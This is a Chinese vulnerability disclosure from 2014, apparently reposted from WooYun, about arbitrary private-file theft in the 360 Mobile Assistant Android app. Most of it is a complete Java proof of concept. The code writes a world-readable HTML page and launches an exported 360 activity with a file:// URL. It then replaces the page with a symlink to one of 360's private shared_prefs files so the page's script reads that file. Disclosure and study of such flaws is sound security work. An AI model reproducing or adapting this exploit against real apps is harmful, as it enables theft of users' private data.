
360手机助手任意数据窃取漏洞

2014-04-18 21:45

利用符号链接,可以绕过文件同源性策略的限制,调用com.qihoo.lightapp.WebAppFakeBrowserLightActivity组件解析执行特定的JavaScript脚本,可以窃取任意私有文件的内容。

具体利用可参考刚公布出来的firefox此类漏洞的利用,详细url参看: https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html

POC如下(借鉴x3xtxt的代码):

String sensitive_file_name = "/data/data/com.qihoo.appstore/shared_prefs/common_config.xml";



DP_WebViewReadAnyFilePoC(sensitive_file_name);

}



/**
 * Standard Android options-menu hook: inflates {@code R.menu.main} into
 * {@code menu}. Generated Activity boilerplate, unrelated to the PoC itself.
 *
 * @param menu the menu object supplied by the framework
 * @return {@code true} so the menu is shown
 */
@Override
public boolean onCreateOptionsMenu(Menu menu) {
    // Inflate the menu; this adds items to the action bar if it is present.
    getMenuInflater().inflate(R.menu.main, menu);
    return true;
}





/**
 * Reproduction step for the report on this page (wooyun-2014-049252): hands the
 * 360 component {@code com.qihoo.lightapp.WebAppFakeBrowserLightActivity} a
 * {@code file://} URL pointing at an HTML file in this app's own files
 * directory, then replaces that file with a symbolic link to {@code targetfile}.
 * The page's script (see {@link #write_payload_file()}) re-requests its own URL
 * after a delay, so what it receives is the content of the linked private file.
 *
 * From a defender's view the weakness this exercises is a component reachable
 * from a third-party app that loads a caller-supplied {@code file://} URL with
 * script enabled; the page's 修复方案 ("限制符号链接") covers only the symlink
 * half — the URL/export boundary of that component is the other half.
 *
 * Sequencing notes: {@link #cmdexec(String[])} returns without waiting for the
 * spawned process, so the shell steps below are ordered only by the sleeps, not
 * by any synchronization. This is PoC code and is not hardened.
 *
 * @param targetfile absolute path of the private file to read through the
 *                   symlink (the caller on this page passes a 360 shared_prefs XML)
 */
public void DP_WebViewReadAnyFilePoC(String targetfile){
    try{
        // HTML payload path under this app's own /data/data/<pkg>/files.
        String shell_poc = "/data/data/"+getApplicationContext().getPackageName()+"/files/shellpoc.html";

        // Write the HTML page; write_payload_file() opens it MODE_WORLD_READABLE.
        write_payload_file();

        // Make the path reachable from the other app's uid (spawned, not awaited).
        cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});

        // Explicit target component and the file:// URL it is asked to load.
        String pkgName = "com.qihoo.appstore";
        String activityName = "com.qihoo.lightapp.WebAppFakeBrowserLightActivity";
        String url = "file://"+shell_poc;

        // Explicit Intent: action + component + file:// data. That a third-party
        // app can hand this component a file:// URL at all is the exposure.
        Intent intent = new Intent();
        intent.setAction("com.qihoo.light.action.WEBAPP_LINK");
        intent.setComponent(new ComponentName(pkgName, activityName));
        intent.setData(Uri.parse(url));
        startActivity(intent);

        // Let the target load the HTML before the file is swapped. The embedded
        // script calls getContent() 4000 ms after load (see write_payload_file),
        // so the swap below has to land inside that window — timing, not a guarantee.
        Thread.sleep(2000);

        // Replace the already-loaded HTML file with a symlink to the target. Same
        // path, so the script's request to location.href now resolves to targetfile.
        cmdexec(new String[] {"/system/bin/rm", shell_poc});
        cmdexec(new String[] {"/system/bin/ln", "-s", targetfile, shell_poc});
        cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});

        // Wait for the script to run (its alert() shows the response), then clean up.
        Thread.sleep(5000);
        cmdexec(new String[] {"/system/bin/rm", shell_poc});
    }catch(Exception e){
        // Catch-all (including InterruptedException from sleep). Reported via
        // debugInfo(), presumably defined elsewhere in this Activity; the
        // interrupt status is not restored.
        debugInfo(e.getMessage());
    }
}







/**
 * Writes {@code shellpoc.html} into this app's files directory. The page holds
 * a minimal self-reading script: 4000 ms after load it issues a GET to
 * {@code location.href} — its own URL — and shows the response in
 * {@code alert()}. On its own that merely re-reads the same file; it becomes a
 * leak only after {@link #DP_WebViewReadAnyFilePoC(String)} has swapped the file
 * for a symlink. The {@code ActiveXObject} branch is IE legacy and is dead on
 * Android.
 *
 * Noted but left as written (PoC code): the file is created
 * {@code MODE_WORLD_READABLE} (deprecated, hence the suppression) because the
 * reading uid is the other app's; {@code getBytes()} uses the platform default
 * charset; and the stream is not closed in a {@code finally}, so an exception in
 * {@code write} leaks the descriptor. Errors are passed to {@code debugInfo()},
 * presumably defined elsewhere in this Activity.
 */
@SuppressWarnings("deprecation")
public void write_payload_file(){
    // JavaScript body of the page: fetch location.href and alert() the response.
    String payloadStr = "function getContent(){ \n" +
        " var url = location.href; \n" +
        " var xmlhttp; \n" +
        " if(window.XMLHttpRequest){ \n" +
        "xmlhttp=new XMLHttpRequest(); \n" +
        " }else{ \n" +
        "xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); \n" +
        " } \n" +
        " \n" +
        " xmlhttp.onreadystatechange=function() \n" +
        " { \n" +
        "if (xmlhttp.readyState==4) \n" +
        "{ \n" +
        " alert(xmlhttp.responseText); \n" +
        "} \n" +
        " } \n" +
        " xmlhttp.open(\"GET\",url,true); \n" +
        " xmlhttp.send(); \n" +
        "} \n" +
        " \n" +
        // Delay before the self-request; DP_WebViewReadAnyFilePoC relies on this window.
        "setTimeout(getContent,4000); \n";

    // Wrap the script in a bare HTML document.
    String htmlStr = "<html> \n" +
        "<head><title>Steal Sensitive Information PoC</title></head> \n" +
        "<body> \n" +
        " <script type=\"text/javascript\"> \n" +
        payloadStr +
        " </script> \n" +
        "</body> \n" +
        "</html>";

    try{
        // World-readable on purpose: the consumer is another app's uid.
        FileOutputStream fOut = openFileOutput("shellpoc.html", Context.MODE_WORLD_READABLE);
        fOut.write(htmlStr.getBytes());
        fOut.close();
    }catch(Exception e){
        debugInfo(e.getMessage());
    }
}







/**
 * Fire-and-forget wrapper around {@link Runtime#exec(String[])}.
 *
 * The spawned process is neither waited for nor read, so callers get no
 * completion or exit-status signal; any exception from the launch is passed
 * to {@code debugInfo()} (defined elsewhere in this Activity) and otherwise
 * swallowed.
 *
 * @param cmd argv-style command line, program first
 */
public void cmdexec(String[] cmd){
    Runtime runtime = Runtime.getRuntime();
    try {
        runtime.exec(cmd);
    } catch (Exception err) {
        debugInfo(err.getMessage());
    }
}

漏洞证明:

2.jpg

修复方案:

限制符号链接

知识来源: www.wooyun.org/bugs/wooyun-2014-049252
